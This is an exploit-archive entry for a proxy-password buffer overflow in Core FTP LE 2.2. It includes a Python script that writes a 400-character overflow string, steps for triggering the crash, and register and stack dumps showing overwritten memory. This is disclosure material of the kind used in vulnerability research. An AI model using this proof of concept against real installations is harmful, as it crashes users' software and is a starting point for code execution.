Core FTP Le 2.2 Buffer Overflow



EKU-ID: 5689 CVE: OSVDB-ID:
Author: s0nk3y Published: 2016-07-12 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
'''
# Exploit Title: Core FTP Le v2.2 - Proxy Password Buffer Overflow
# Date: 2016-7-11
# Author: s0nk3y
# Software Link: ftp://ftp.coreftp.com/coreftplite.exe
# Version: 2.2
# Tested on: Windows XP
# CVE: N/A
# Type: Buffer Overflow

[+] Proof of concept
 Click options (Global Settings) -> Proxy -> enter the password and input "A"*400 -> Ok 

[+] Registers Detail:
EAX 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
ECX 41414145
EDX 0012CE64
EBX 41414145
ESP 0012CB1C
EBP 0012D0C4 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
ESI 41414141
EDI 0012CF54 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...
EIP 004A1523 coreftp.004A1523
'''

buffer = "A" * 400
exploit = open("exploit.txt","w")
exploit.write(buffer)
exploit.close

'''
[+] Stack:
0012CCEC   00000003  ...
0012CCF0   00498BFE  þ‹I.  RETURN to coreftp.00498BFE from coreftp.004A1520
0012CCF4   0012D124  $Ñ.  ASCII "AAAAAAAAAAAAA...
0012CCF8   0012D034  4Ð.
0012CCFC   41414141  AAAA
0012CD00   00000000  ....
0012CD04   41414141  AAAA
0012CD08   41414141  AAAA
0012CD0C   41414141  AAAA
0012CD10   41414141  AAAA
0012CD14   41414141  AAAA
0012CD18   41414141  AAAA
0012CD1C   41414141  AAAA
....
'''